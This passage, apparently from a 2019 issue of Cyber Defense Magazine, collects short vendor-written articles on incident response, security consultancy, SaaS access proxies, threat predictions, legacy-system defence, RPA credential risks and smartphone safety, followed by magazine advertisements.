seem unorthodox, such "software duct tape" can<br />

get the job done long enough to bridge the gap<br />

until the root cause of the issue can be properly<br />

fixed.<br />

All of these actions are process measures that<br />

every manufacturer can undertake as part of<br />

their development efforts. With effective<br />

monitoring of known vulnerabilities, fast<br />

response time, competent triaging, and rollout of<br />

mitigation, many cybersecurity attacks can be<br />

stopped before they ever can develop. If all of<br />

the above advice is followed, however, how can<br />

one measure the performance or effectiveness<br />

of such a process?<br />

Similar to functional testing, security can also be<br />

proactively tested. In particular, when we are<br />

looking at products, penetration tests can often<br />

achieve this goal. Pentesting is when ethical<br />

hackers – people who are paid to find<br />

vulnerabilities in products – try to hack the<br />

product so the unethical hackers don't get to.<br />

These pentesters will report any findings to the<br />

vendor and the issues can be fixed as part of the<br />

regular development cycle, with some<br />

weaknesses patched before they are ever<br />

deployed in the field.<br />

Still, it is a possibility that despite all those best<br />

efforts, a product or company gets hacked in the<br />

wild, with no prior warning or heads-up at all. Of<br />

course, this can be a very difficult and stressful<br />

event to manage, but when this happens it’s<br />

crucial to again remain calm and be deliberate<br />

about the responding steps. It could make a<br />

situation much worse by falling into panic.<br />

Ideally, the person who is designated as<br />

responsible for security already has an incident<br />

response plan worked out. Of course, this plan<br />

cannot know of any attack details – but it<br />

considers the infrastructure and components<br />

within it and can estimate different rough<br />

scenarios. In a well-prepared environment,<br />

many of these scenarios will have been played<br />

through as part of the threat and risk analysis –<br />

the correct vendor responses are already<br />

roughly laid out.<br />

In the aftermath of an incident, finding the root<br />

cause and performing a forensic analysis of the<br />

attack is almost as crucial as mitigating it in the<br />

first place. You would want to find out all the<br />

details, including (but not limited to) when the<br />

attack started, what the attack vector or process<br />

154


used to exploit the system was, what data was<br />

compromised, modified or deleted, and how you<br />

can effectively guarantee going forward that this<br />

vector cannot be used again to compromise your<br />

infrastructure or product.<br />

Rolling out good security is much like playing a<br />

game of chess – you do not get to pick the move<br />

your opponent will make, but you can plan well<br />

ahead and you alone get to choose the<br />

appropriate response. Well-defined<br />

responsibilities, and proper issue and<br />

vulnerability tracking go a long way, and are as<br />

close as they will get, to preventing security<br />

attacks before they even start. However, just like<br />

in chess you can expect to have some setbacks.<br />

Careful planning to help ensure timely response<br />

to events is therefore vital. NIST has a great<br />

summary for this approach in their <strong>Cyber</strong>security<br />

Framework – Identify. Protect. Detect. Respond.<br />

Recover.<br />

In today’s world, security is everyone’s business.<br />

What are you doing to help secure your<br />

systems?<br />

To learn more, visit IMS.UL.com.<br />

About the Author<br />

Dr. Johannes Bauer is the principal security advisor, identity management<br />

& security, for UL in Frankfurt, Germany. Dr. Bauer has a Ph.D. in<br />

Computer Science and has over ten years of experience in the field of IT<br />

security. In particular, he has worked in the fields of electromobility and<br />

smart home systems. Dr. Bauer has expert knowledge of physical threats<br />

to embedded systems, both invasive and non-invasive, and he has<br />

published multiple papers on mitigation strategies to thwart such attacks.<br />

He has frequently led workshops on topics of applied cryptography and<br />

worked as a security consultant, guiding secure software design and<br />

development as well as practical threat and risk assessment.<br />

UL is a global safety science company. To learn more, visit:<br />

https://www.ul.com/<br />

155


What Does A <strong>Cyber</strong> Security Consultant Do?<br />

By Stuart Cooke, Digital Marketing Manager at Evalian<br />

Are you considering becoming a cyber security consultant? Or perhaps you’ve recently become<br />

aware of the importance of this type of security and youre looking to hire a professional to<br />

support your business? Either way, cyber security roles are on the rise thanks to the<br />

technological world we now live in.<br />

But if youre not completely familiar with cyber security or the roles these individuals play in<br />

keeping us safe from cybercrime, we’re here to help. In this guide we’ll look at the importance of<br />

cyber security and what these individuals actually do. So, whether youre doing research for your<br />

next career move or you’re trying to decide whether it’s worth hiring a cyber security professional,<br />

check out the guide below for more information.<br />

Why is cyber security so important?<br />

It might surprise you to know that data is now the most valuable resource in the world, even<br />

overtaking the oil industry. But with so much of our lives now online our personal data has<br />

become very vulnerable. In fact, this is why the new General Data Protection Regulation (GDPR)<br />

has been put in place to give EU citizens more rights over their own data.<br />

156


As you can imagine, as technology grows the internet becomes more integral to our lives and<br />

as people increasingly find new ways to collect and share our data, there is also a higher risk of<br />

this data becoming misused. As technology has developed, so has the threat of cybercrime.<br />

What was once just a fictional villainous ‘hacker’ in a movie, has now become a very real-life<br />

problem and something we all need to be aware of.<br />

These criminals are always finding new ways to hack information or scam money from innocent<br />

victims. This is why individuals and businesses alike need to have at least a basic understanding<br />

of cyber security. Many businesses will look to trained professionals to help ensure they meet<br />

all GDPR regulations and that they are protecting themselves and their customers from<br />

cybercrime. And that’s where cyber security consultants come in.<br />

What is a cyber security consultant?<br />

In a nutshell, a cyber security consultant is hired by a business or individual to help them prevent<br />

a security threat. They do this by assessing the company’s technologies and systems to see<br />

where their vulnerabilities lie. Essentially, they must play the role of a hacker by thinking ‘what<br />

could I do to access this information’ and then play the role of the victim and think about the<br />

impact this could have on their personal life. This helps them to spot any holes or potential<br />

threats. In fact, some cyber security consultants used to be hackers themselves and understand<br />

how vulnerable some companies can really be to cybercrime.<br />

What does a cyber security consultant do?<br />

Above we’ve briefly touched on what a consultant is and how they work with businesses, but<br />

now let’s get down to the nitty gritty of the role. By trawling through each system, software and<br />

computer acting as both the hacker and victim, the consultant is able to make an exhaustive<br />

review of the companys security (or lack thereof). This is why most businesses e mployer IT<br />

professionals of this nature, even if this is on a contract basis. The government even use these<br />

consultants to help protect they huge amount of data they possess.<br />

Once the consultant has highlighted all the potential threats they then move on to the next phase,<br />

they help the company to design and then implement a security strategy for the business. They<br />

will usually recommend the best software, hardware, firewalls and other security measures to<br />

ensure the daily running of the business goes smoothly and that their data and important<br />

information stays safe - particularly when sharing documents online.<br />

So what do they do on a daily basis?<br />

Hiring a cyber security consultant isnt a one -time gig. Once they’ve got a strong system in place<br />

their daily responsibilities are all about monitoring the systems and updating security measures<br />

where possible. They may also have to get involved if there is a breach of security and help to<br />

teach other members of staff best practices for cyber security. Below are a few of the daily tasks<br />

a cyber security consultant can be expected to perform:<br />

157


• Speak with staff about any security problems or issued they’ve noticed in the past<br />

• Educate other employees about security best practice and how they can spot a potential<br />

threat before it happens<br />

• Determine the best way to protect the company’s computers, software, data and information<br />

from potential cyber attacks<br />

• Keep up to date with the latest technologies and software to ensure the business is using the<br />

most effective systems<br />

• Test security solutions<br />

• Create and deliver reports on these security tests to report back to the senior team<br />

• Deal with any breaches or security related issues immediately and provide a detailed report<br />

of what happened<br />

• Continue to update and upgrade security systems<br />

• Create detailed reports and estimates about the cost of new security systems<br />

• Interview potential new team members if planning to expand the cyber security or IT team<br />

What does it mean to be a cyber security consultant?<br />

As you can see, being a cyber security consultant is a very important job! With new technologies<br />

always emerging, the threat of cybercrime is always on the rise. Businesses (and even<br />

individuals) that want to protect themselves from potentials hackers or scammers need to be<br />

aware of any problems with their current security system, and that is why hiring a cyber security<br />

consultant is so important.<br />

Not only are they able to analyse any potential risks, they are knowledgeable about the latest<br />

software and systems to ensure the business has the best security measures in place. They also<br />

continue to update these systems as new threats and technologies emerge. The digital world is<br />

moving fast, which means cyber criminals are always finding new ways to get into these systems.<br />

That’s why consultants need to be proactive and always developing their knowledge of the<br />

industry and latest technologies.<br />

About the Author<br />

Stuart Cooke, Digital Marketing Manager at Evalian, experts and consultants in all<br />

things cyber security.<br />

158


A10 Networks Cloud Access Proxy Provides Secure Access and<br />

Visibility for SaaS Apps<br />

By Yasir Liaqatullah, vice president of product management at A10 Networks<br />

A10 Networks today announced a new Cloud Access Proxy (CAP) solution that provides secure access<br />

to software as a service (SaaS) applications, such as Microsoft Office 365, optimizing branch offices with<br />

better performance, stronger security and an enhanced user experience. Additionally, the solution<br />

provides full visibility into SaaS applications for improved security. The CAP solution is comprised of three<br />

components: the new A10 Networks Thunder® 840 CAP appliance for the branch office, higherperformance<br />

Thunder® Convergent Firewall (CFW) platforms for the headquarters, and the new<br />

centralized CAP Visibility and Analytics solution, which provides centralized insights into outbound<br />

application traffic and SaaS application usage. Together, the CAP solution ensures that access to SaaS<br />

applications and data is accelerated and secured while maintaining full, centralized visibility across<br />

sanctioned and unsanctioned applications.<br />

SaaS and Multi-cloud Environments Increase Security Challenges<br />

Traditionally, enterprise networks were designed to provide users with access to applications and<br />

services hosted locally within their data centers. To secure user access to the internet and to protect<br />

them from cyber threats, a large central security stack was typically hosted to inspect traffic going in and<br />

159


out of the network. As organizations grew and expanded into multiple branch offices, they were forced<br />

into a hub-and-spoke deployment model where all branch office traffic was routed back to the central<br />

security stack for policy enforcement and inspection.<br />

With the increased adoption of SaaS applications, as well as the rapid move towards multi-cloud<br />

deployments, enterprise networks are changing with the consolidation of WAN edge infrastructure and<br />

migration from MPLS. Maintaining the security and user experience is increasingly challenging in this<br />

environment.<br />

A10 Networks CAP solves these problems by consolidating different features of multiple point products,<br />

like software-defined-WAN, cloud access security brokers and secure web gateways, providing a unified<br />

solution for SaaS optimization, security and visibility. These features include:<br />

• Local breakout – For branch office traffic optimization using intelligent classification and bypassing<br />

of SaaS traffic from other application traffic.<br />

• Next hop load distribution (NHLD) – For dynamic traffic distribution across multiple WAN<br />

connections.<br />

• Tenant access control – For data theft prevention between sanctioned and unsanctioned SaaS<br />

tenant accounts.<br />

• URL filtering – For traffic categorization and protection from web threats.<br />

• Application visibility and control – For dynamic recognition and categorization, as well as filtering<br />

of application traffic.<br />

• IPsec VPN – For securing internet traffic, backhauled from branches to the central security stack.<br />

• AppCentric templates (ACT) – For simplified, one-step deployments at new branch offices.<br />

• CAP visibility and analytics solution – For visibility across sanctioned and unsanctioned<br />

application traffic at the branch office and in the cloud.<br />

Traditional enterprise networks are not optimized for SaaS application traffic and the security provided<br />

by the SaaS vendor is not adequate in addressing today’s cyber threats and increasing use of shadow<br />

IT. A10 Networks’ Cloud Access Proxy is designed specifically to help organizations optimize the<br />

performance and security of their SaaS application traffic.<br />

The rapid increase in SaaS usage makes the Cloud Access Proxy solution perfect for deployment in<br />

small to medium enterprises (SME) and verticals like education, legal, finance and manufacturing.<br />

Availability<br />

The complete Cloud Access Proxy solution, including Thunder 840 Cloud Access Proxy, Thunder CFW,<br />

and the centralized Cloud Access Proxy Visibility and Analytics solution, is available now.<br />

The centralized Cloud Access Proxy Visibility and Analytics solution will also be available as an add-on<br />

app on the A10 Harmony Controller® in early 2020.<br />

160


About the Author<br />

As VP of Product Management, Yasir drives A10’s portfolio of 5G Service<br />

Provider Solutions and Security portfolio. Yasir can be reached online at<br />

(EMAIL: YLiaqatullah@A10networks.com) and at our company website<br />

https://www.a10networks.com/<br />

161


3 <strong>Cyber</strong>security Trends & Predictions for 2020 (from Illumio)<br />

PJ Kirner, CTO & Founder of Illumio<br />

1) “We’ll start to hear more about the convergence of physical infiltration with cyberattacks,<br />

challenging security across the board.”<br />

“<strong>Cyber</strong>attacks on an enterprise or a government can be carried out remotely but, in <strong>2019</strong>, we started<br />

hearing more about the physical element added to the mix. Just look at the woman who had a thumb<br />

drive loaded with malware that got into Mar-a-Lago. Although she wasn’t able to successfully tap into the<br />

network, she still had a convincing enough story to get past physical checkpoints manned by the Secret<br />

Service.<br />

And it doesn’t take sophisticated software or intelligence operations to execute these attacks – a wellplanned,<br />

staged scenario is all it takes. For instance, someone could pose as an electrician to gain<br />

physical access to a hospital being built, walking around unimpeded until they find an unprotected device<br />

to access the network. I believe we’ll see more of these high-profile, hybrid cyber-physical attacks<br />

162


in 2020.”<br />

2) “AI and speech technology will be exploited, making voice a new weapon of choice.”<br />

“If there’s one thing that malicious actors are good at, it’s creativity. We’ll see business email compromise<br />

(BEC) extend further over into voice next year. Even though many organizations have educated<br />

employees on how to spot potential phishing emails, many aren’t ready for voice to do the same<br />

as they’re very believable and there really aren’t many effective, mainstream ways of detecting them.<br />

And while these types of “voishing” attacks aren’t new, we’ll see more malicious actors<br />

leveraging influential voices to execute attacks next year.<br />

And it’s not as hard as it sounds - it’s easier than ever to get an audio clip of an executive, CEO, or world<br />

leader giving a speech and then altering it for nefarious purposes. Imagine receiving an urgent call or<br />

voicemail from your “boss”, asking to share credentials for a secure platform or system. Without any<br />

packaged-up, off-the-shelf solutions to help detect these threats, we’re going to see a lot more voicerelated<br />

attacks in 2020 that will be harder to identify and even harder to protect against.”<br />

3) “Our sons and daughters will quickly become a new threat vector to enterprise security.”<br />

“Almost everyone has a smart, connected device these days and kids are no exception. If they don’t have<br />

their own, they’ll probably just grab their parents’ phone or tablet to play games or watch TV - often<br />

unsupervised. As digital natives, technology is second nature to them but they’re not thinking about<br />

cybersecurity at all, which is why they’ll become prime targets.<br />

Unfortunately, no one is off limits when it comes to cybersecurity threats and our kids will be squarely in<br />

the crosshairs next year. Whether it’s the child of an executive, an executive assistant, or even someone<br />

with administrative privileges, it only takes one wrong click for them to implant malware on their parent’s<br />

phone, opening up the back door for a bad actor to get into the company network. This will become much<br />

more prevalent in 2020.”<br />

About the Author<br />

As Chief Technology Officer and founder, PJ is responsible for Illumio’s<br />

technology vision and platform architecture. PJ has 20 years of<br />

experience in engineering, with a focus on addressing the complexities<br />

of data centers. Prior to Illumio, PJ was CTO at Cymtec. He also held<br />

several roles at Juniper Networks, including distinguished engineer<br />

focused on advancing Juniper’s network security and layer 4-7 services<br />

plane. PJ graduated with honors from Cornell University.<br />

163


Applying Security Across Heterogeneous IT Systems<br />

Proactive Threat Interference ® provides protection not offered<br />

by other cybersecurity approaches<br />

By Steve Ryan, CEO & Co-Founder, Trinity <strong>Cyber</strong>, Inc.<br />

Do I patch my system in the name of security, or do I leave it unpatched to enable critical operations and<br />

business functions?<br />

Heeding CIO or CISO advice to patch systems and update information technology (IT) as soon as an<br />

update is available is a best practice that will help secure systems against most known threats and<br />

vulnerabilities before they can be exploited. However, there are times when you simply cannot avoid<br />

maintaining legacy IT. How does one choose between security and operations? Incident response will<br />

only get you so far. Adopting an adversary disruption strategy becomes a critical element of any security<br />

posture for heterogeneous IT systems. Getting in the adversary’s way means that you don’t always have<br />

to choose – you can have both.<br />

The legacy dilemma<br />

IT ecosystems change and evolve over time, but their functions usually remain constant. Critical<br />

functionality often centers on connectivity between IT and more expensive assets. Take the example of<br />

a weapons system built to communicate with an early version of Microsoft Windows. While the outdated<br />

164


operating system is vulnerable to exploitation, updating the IT would require an expensive interface<br />

retrofit or even replacement of the entire weapons system at a huge cost.<br />

This legacy dilemma affects large-scale, expensive functionality most acutely. Machines in manufacturing<br />

operations or critical systems for municipalities tied to obsolete software can prove too costly to replace.<br />

Even more common is payroll software running on old operating systems or obsolete and unsupported<br />

software.<br />

Other compatibility challenges<br />

Many endpoint security products only operate on the most recent Windows operating systems and are<br />

not designed to protect systems that use other operating systems. Nor can they defend other IT<br />

infrastructure, like modems or routers. In these circumstances, the network’s firewall assumes even<br />

greater responsibility for blocking attackers before they can reach individually unprotected computers or<br />

devices. Unfortunately, firewall access control lists can wreak havoc on legitimate communications paths<br />

used by legacy systems. In addition, firewalls can be susceptible to control by the adversary, completely<br />

compromising unprotected endpoints.<br />

Often, larger corporations inherit distinct IT infrastructures from each firm incorporated into the whole<br />

through mergers and acquisitions. This creates a patchwork system incompatible with a common<br />

endpoint defense. Those companies embracing Internet of Things (IoT) substantially increase the<br />

number of network endpoints and also introduce riskier technology. Current IoT devices simply lack the<br />

processing power to perform even basic security measures and rely entirely on extra-device measures.<br />

Endpoint security and the use of firewalls are critical and should remain staples in any cybersecurity<br />

protocol. The problem, however, is that these measures treat the cyber threat like an inevitable force of<br />

nature against which victims are powerless. Incident response and recovery is as passive as preparing<br />

for and enduring a storm – yet the cyber threat bears no resemblance to weather. Instead, it is created<br />

by an adversary who has an objective, a set of tools, and a level of knowledge. If a malicious hacker has<br />

you in his sights, you can passively hunker down, or you can proactively get in his way.<br />

Understanding the adversary’s playbook<br />

Adversaries routinely capitalize on unevenly defended networks and known vulnerabilities of common<br />

applications and operating systems. A month after Microsoft released an unprecedented patch for<br />

Windows XP, The Shadow Brokers published a set of tools that exploited the weaknesses in how<br />

Windows XP uses the Server Message Block protocol. Shortly after, the WannaCry ransomware attack<br />

and devastating NotPetya attack affected hundreds of thousands of Windows XP systems that had not<br />

upgraded, at an estimated worldwide cost of between $14 billion and $18 billion. 6 Some systems remain<br />

exposed to this threat today.<br />

6<br />

https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/<br />

165


This is a classic example of why relying on patch management alone is a failing and costly strategy.<br />

Heterogeneous or legacy-bound systems require a strategy for actively disrupting cyberattacks when installing a<br />

patch will take time and could hinder important functionality. Likewise, homogeneous networks require<br />

the same strategy for defense before a patch can be installed.<br />

One example of this adversary-focused approach is a strategy my team and I developed for protecting<br />

the Department of <strong>Defense</strong> networks against the Heartbleed vulnerability. After a researcher published<br />

a method of getting target systems to spew data from memory, teams across the cybersecurity space<br />

acted quickly to spread word of the vulnerability. By contrast, my team used the attempt at exploiting<br />

these vulnerable systems to identify those systems and neutralize the incoming threats to vulnerable<br />

devices until an upgrade could take place. In short, we interfered with the adversary’s attacks and used<br />

their methods to benefit us.<br />

Exploiting adversary methodology offers a critical strategy for protecting uneven defenses and networks<br />

in need of an upgrade. Every adversary must complete a series of actions in sequence to attempt an<br />

attack. Rather than simply blocking an adversary based on simple indicators of compromise (IOCs) or<br />

even next generation firewall rules, why not disrupt the adversary’s methodology? And if you can, use<br />

the adversary’s methodology to your favor? <strong>Cyber</strong>security professionals can not only increase adversary<br />

work factor but can also decrease their operational expenses by reducing the number of incidents to<br />

respond to.<br />

<strong>Cyber</strong>security strategy for incompatible networks<br />

Any network, including heterogeneous networks and those running outdated software, can add a valuable<br />

layer of defense by operationalizing knowledge about the adversary and adopting a strategy of adversary<br />

disruption rather than passive response and recovery.<br />

Proactive Threat Interference® from Trinity <strong>Cyber</strong> aids this strategy by invisibly monitoring threats outside<br />

a network’s perimeter and adapting to intercept and neutralize cyberattacks based on the adversary’s<br />

tactical toolbox. Ultimately, an integrated security posture – with threat interference, an impermeable<br />

firewall, and endpoint security – represents the strongest safeguard against infiltration and costly<br />

remediation.<br />

166


About the Author<br />

Mr. Ryan is Co-founder and Chief Executive Officer of Trinity <strong>Cyber</strong>, Inc., a<br />

disruptive technology company fundamentally redefining commercial<br />

cybersecurity.A recognized leader in cybersecurity, Steve left the National<br />

Security Agency in 2016 as the Deputy Director of its Threat Operations<br />

Center after a distinguished 32-year career as a custom chip designer and<br />

cybersecurity operator. Steve excels in leading special projects and<br />

challenging the status quo to develop unique solutions to the world’s most<br />

complex problems. He has applied his unique skills and vision to develop a<br />

fundamentally new approach to cybersecurity. The solution he developed<br />

propelled Steve to found Trinity <strong>Cyber</strong> and create its Proactive Threat Interference® capabilities. Only<br />

through approaching the problem in a singularly different way, Steve has developed a methodology and<br />

technology that finally addresses the cyber threat at its core – the adversary.Steve holds a Bachelor of<br />

Science degree in Electrical Engineering from the University of Rhode Island. He was a primary architect<br />

of the NSA’s NTOC, bringing together intelligence and defensive missions to identify and stop cyber<br />

threats at very large scale. Steve is a recipient of the Presidential Rank Award, the Exceptional Civilian<br />

Service award, and a first-place winner of the Department of <strong>Defense</strong> CIO Award.<br />

167


The Security Challenges of Robotic Process Automation—A<br />

Primer<br />

By Kevin Ross, Global Solutions Engineer, <strong>Cyber</strong>Ark<br />

Robotic process automation (RPA) is one of the hottest technologies in the IT market today. These<br />

systems enable software robots to replicate the actions of human workers for tasks such as data entry,<br />

and they can bring greater efficiencies and accuracy to many key business processes.<br />

The technology has the potential to deliver huge benefits to companies. These include increased<br />

efficiency of workflows, improved accuracy of transactions, and significant cost savings through the<br />

reduction of labor by automating the execution of repetitive, time-consuming manual tasks.<br />

RPA can also be a significant IT security risk, particularly around the credentials used to manage RPA<br />

implementations. Because of that, organizations need to be vigilant about how they secure their RPA<br />

deployments.<br />

The Benefits of RPA<br />

Companies that include manufacturers, financial services firms, engineering firms, and insurance<br />

companies use RPA to automate all kinds of routine tasks. The software “bots” that are key components<br />

of the software follow a set of programmed rules to carry out activities people would ordinarily perform.<br />

168


In some cases, the RPA bots work together with humans for functions such as moving or copying data<br />

between applications.<br />

Companies that rely on a large human workforce for process work, in which people perform high-volume,<br />

transactional functions, stand to gain from using RPA, according to the Institute for Robotic Process<br />

Automation and Artificial Intelligence (IRPA AI).<br />

RPA software can deliver efficiencies to enterprise applications such as enterprise resource management<br />

(ERP), customer relationship management (CRM), supply chain management, and applications that<br />

support functions in human resources and finance.<br />

Clearly the emerging technology is having a huge impact on the way enterprises perform day-to-day<br />

business processes.<br />

According to Deloitte, 53 percent of organizations have started to leverage RPA to robotize and<br />

automate repetitive tasks to allow the human workforce to focus on higher value work. Overall, RPA<br />

adoption is expected to increase to 72 percent in the next two years and, if adoption continues at its<br />

current level, RPA will achieve near-universal adoption within the next five years.<br />

While RPA software is being deployed in all industries, the biggest adopters include banks, insurance<br />

companies, telecommunications providers and utility companies.<br />

These companies traditionally have lots of legacy systems, and implement RPA tools to enhance<br />

integration among these systems and quickly accelerate their digital transformation efforts while<br />

leveraging their IT investments.<br />

This is creating new security risks that organizations need to be aware of.<br />

Addressing the Security Risks<br />

Considering the scale and speed at which bots work and the number of systems and applications they<br />

can access, security should be a primary consideration when deploying the technology.<br />

As with any other newer technology, RPA can easily become a new attack vector for bad actors if security<br />

isn’t factored into the platforms.<br />

RPA software interacts directly with critical business systems and applications, which can introduce<br />

significant risks when bots automate and perform routine tasks. Bots don’t need administrative rights to<br />

perform their tasks.<br />

But they do need privileged access to log in to ERP, CRM and other enterprise business systems to<br />

access data, copy or paste information, or move data through a process from one step to the next.<br />

Privileged access without security is a recipe for disaster.<br />

According to a recent study, 84 percent of organizations believe that IT infrastructure and critical data is<br />

not secured unless privileged accounts are fully protected.<br />

The typical approach in providing privileged access credentials to bots is to hard-code privileged access<br />

credentials into the script or rules-based process a bot follows. With another method, the script might<br />

169


include a step to retrieve credentials from an insecure location such as an off-the-shelf application<br />

configuration file or database.<br />

As demand for RPA increases among lines of business, the number of privileged account credentials<br />

hard-coded into scripts or stored insecurely grows. That significantly increases the associated risks.<br />

With these approaches, the credentials end up being shared and reused repeatedly. Unlike the<br />

credentials used by humans, which typically must be changed regularly, those used by bots remain<br />

changed and unmanaged.<br />

As a result, they’re at risk from cyber criminals and other bad actors who are able to read or search scripts<br />

to gain access to the hard-coded credentials. They are also at risk from users who have administrator<br />

privileges, who can retrieve credentials stored in insecure locations<br />

As RPA deployments expand to include larger numbers of bots, the risks become exponentially greater<br />

for organizations. If privileged account credentials used within an RPA platform are left unmanaged and<br />

unprotected, that can transform RPA processes into a backdoor through which attackers can gain access<br />

to corporate systems and do damage.<br />

Organizations can take three critical steps to start mitigating the risk of the RPA pipeline becoming<br />

compromised, building security directly into their RPA workflows and processes.<br />

1. Store and manage privileged credentials securely<br />

To keep privileged account credentials from falling into the wrong hands, they can remove credentials<br />

from bot scripts and other insecure locations.<br />

Instead, they can be stored in a system that encrypts the credentials; holds them in a secure location;<br />

hands them securely to authenticated bots on-demand; automatically rotates credentials at regular<br />

intervals or on-demand; removes human intervention from the process; and scales to meet rapid growth<br />

in RPA use.<br />

2. Limit the bots’ application access<br />

If an attacker acquires privileged account credentials, companies can minimize the impact by limiting the<br />

number of applications to which the credentials allow access.<br />

That means granting bots privileged access only to the specific applications they need, preventing other<br />

applications from executing. This prevents bad actors from using multiple applications on a client machine<br />

and gaining the local administrator rights allowing them to install spyware and other malware.<br />

3. Protect administrator credentials or else<br />

Companies should deploy a secure infrastructure that protects and manages administrator credentials in<br />

the same way as bot credentials, using encryption and secure storage and automatic rotation; and allows<br />

isolation and monitoring of administrator activity.<br />

By taking the necessary steps, organizations can benefit from RPA and minimize the risks.<br />

170


About the Author<br />

Kevin Ross is a Sr. System Engineer at <strong>Cyber</strong>Ark (NASDAQ: CYBR). He is<br />

an experienced system engineer with a demonstrated history of working in<br />

the computer software industry. Previous to <strong>Cyber</strong>Ark, he was a support<br />

engineer and project manager at Barracuda (NYSE: CUDA). He’s skilled in<br />

Session Initiation Protocol (SIP), Domain Name System (DNS), Mac,<br />

Transmission Control Protocol (TCP), and more. He has a B.S. in Computer<br />

Information Services from Southern Adventist University. Kevin can be<br />

reached online at LinkedIn. For more information<br />

at: https://www.cyberark.com/<br />

171


5 Simple Ways to Protect Your Smartphone from <strong>Cyber</strong><br />

Attacks<br />

By Jamshaid Chaudhary, Kamil Web Solutions<br />

Where the onset of the internet has been a blessing for almost everyone, it has also proved to be a curse<br />

for many of us. Hackers are improvising new ways to burst the privacy bubble of people. Security experts<br />

warn us that most cyber-attacks initiate from our smartphones. And despite the alarming number of<br />

hacking incidents in the last decade, an average person doesn’t know how to protect his smartphones<br />

from these attacks.<br />

In addition to getting personal information of people, these hackers target company employees to hack<br />

into a business smartphone to obtain vital information. Therefore, taking appropriate precautions to<br />

protect your phone is more important than it has ever been.<br />

Here are 5 simple ways to keep your smartphone’s data secured.<br />

Use Trusted Wi-Fi and Bluetooth<br />

Most people connect to public Wi-Fi without giving it a second thought. What they don’t know is that these<br />

public Wi-Fi’s can be used to obtain sensitive information from the connected devices. Most hotels and<br />

event venues have their security protocols in place, but free public Wi-Fis in areas like shopping centers,<br />

cafes, airports and parks and far less secure and should be used wisely.<br />

172


Whenever you are in a public place, it is best to keep your Wi-Fi turned off or use it through a VPN which<br />

re-routes your network traffic through an encrypted connection.<br />

Use Two-Factor Authentication<br />

You should take benefit of every possible security procedure available to make your device as secure as<br />

it can be. A two-factor authentication (2FA) is a solid barrier which prevents unwarranted access of your<br />

personal data and information.<br />

Most people don’t use this feature because it requires an extra step for verification but imagine all your<br />

information that is put on stake if you skip 2FA. Nowadays, due to fingerprint technology and savepassword<br />

options, this feature is much easier to use.<br />

Use Trusted Apps<br />

It is imperative that you should only download apps from sources that are trustable, especially the ones<br />

that use your GPS location. While iPhone has some trustable apps for tracking like iphone location<br />

tracking, the standards are not that high in an Android. An android phone allows installation from various<br />

sources and people fall prey to cyber-attacks due to fishy apps.<br />

Best way to avoid this is by sticking to apps that are allowed by App Store on the iPhone and Play Store<br />

on Android and make sure they can be trusted before giving them any permissions.<br />

Ignore Spam and Phishing Emails<br />

The most common way a hacker uses to crawl his way through the company’s security protocol is by<br />

breaking into an employee’s inbox. You should educate yourself on how to avoid these emails and identify<br />

phishing emails from original ones.<br />

Make sure that you don’t give your personal information to anyone online and cross-check the sender’s<br />

identity before engaging in a conversation with him.<br />

Keep your Apps Updated<br />

Most people delay the updates of their operating system and apps. But delaying it for a very long time<br />

compromises the security features of an app. Developers are trying to keep up with the hackers by rolling<br />

regular security updates for apps and operating system, and you should download these update as soon<br />

as possible to keep your data secure.<br />

173


Author the Author<br />

Jamshaid Chaudhary.I began writing as a professional on my<br />

personal blog and then discovered my true calling, which is writing<br />

about technology, News and gadgets in general. I am a technical writer,<br />

author, and blogger since 2010. An industry watcher that stays on top<br />

of the latest features, extremely passionate about juicy tech news and<br />

everything related to gadgets. For tech tips, visit<br />

http://crazytechpoint.org/ my email address is<br />

jamsheed1480[at]gmail[dot]com. Company Name: Kamil Web<br />

Solutions Site: https://www.kamilwebsolutions.ae/<br />

174


175


176


177


178


179


180


181


182


183


184


185


186


187


188


189


190


191


192


193


Meet Our Publisher: Gary S. Miliefsky, CISSP, fmDHS<br />

“Amazing Keynote”<br />

“Best Speaker on the Hacking Stage”<br />

“Most Entertaining and Engaging”<br />

Gary has been keynoting cyber security events throughout the year. He’s also been a<br />

moderator, a panelist and has numerous upcoming events throughout the year.<br />

If you are looking for a cybersecurity expert who can make the difference from a nice event to<br />

a stellar conference, look no further email marketing@cyberdefensemagazine.com<br />

194


You asked, and it’s finally here…we’ve launched <strong>Cyber</strong><strong>Defense</strong>.TV<br />

At least a dozen exceptional interviews rolling out each month starting this summer…<br />

Market leaders, innovators, CEO hot seat interviews and much more.<br />

A new division of <strong>Cyber</strong> <strong>Defense</strong> Media Group and sister to <strong>Cyber</strong> <strong>Defense</strong> Magazine.<br />

195


Free Monthly <strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> Via Email<br />

Enjoy our monthly electronic editions of our Magazines for FREE.<br />

This magazine is by and for ethical information security professionals with a twist on innovative consumer<br />

products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our<br />

mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best<br />

ideas, products and services in the information technology industry. Our monthly <strong>Cyber</strong> <strong>Defense</strong> e-<br />

Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare<br />

arena plus we’ll inform you as next generation and innovative technology vendors have news worthy of<br />

sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here<br />

to sign up today and within moments, you’ll receive your first email from us with an archive of our<br />

newsletters along with this month’s newsletter.<br />

By signing up, you’ll always be in the loop with CDM.<br />

Copyright (C) <strong>2019</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G.<br />

SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a<br />

<strong>Cyber</strong><strong>Defense</strong>Awards.com, <strong>Cyber</strong><strong>Defense</strong>Magazine.com, <strong>Cyber</strong><strong>Defense</strong>Newswire.com,<br />

<strong>Cyber</strong><strong>Defense</strong>Professionals.com, <strong>Cyber</strong><strong>Defense</strong>Radio.com and <strong>Cyber</strong><strong>Defense</strong>TV.com, is a Limited Liability<br />

Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465,<br />

<strong>Cyber</strong> <strong>Defense</strong> Magazine® is a registered trademark of <strong>Cyber</strong> <strong>Defense</strong> Media Group. EIN: 454-18-8465, DUNS#<br />

078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com<br />

